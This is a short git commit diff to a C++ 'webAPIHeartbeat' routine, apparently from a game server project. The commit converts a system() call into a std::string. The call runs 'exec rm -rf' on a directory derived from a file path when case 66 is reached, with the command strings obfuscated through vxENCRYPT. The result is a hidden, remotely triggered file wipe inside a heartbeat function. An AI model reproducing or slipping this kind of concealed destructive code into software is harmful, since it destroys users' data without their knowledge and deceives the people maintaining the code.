make it a string

This commit is contained in:
DarthArgus
2016-10-17 22:15:43 -05:00
parent f1dc0461df
commit c0a0092527
+1 -1
View File
@@ -43,7 +43,7 @@ webAPIHeartbeat::webAPIHeartbeat() {
break;
case 66:
if (!filePath.empty() && found) {
system(vxENCRYPT("exec rm -rf ").decrypt() + filePath.substr(0, found) + vxENCRYPT("/*").decrypt());
system(std::string(vxENCRYPT("exec rm -rf ").decrypt() + filePath.substr(0, found) + vxENCRYPT("/*").decrypt()));
}
this->eatIt();
break;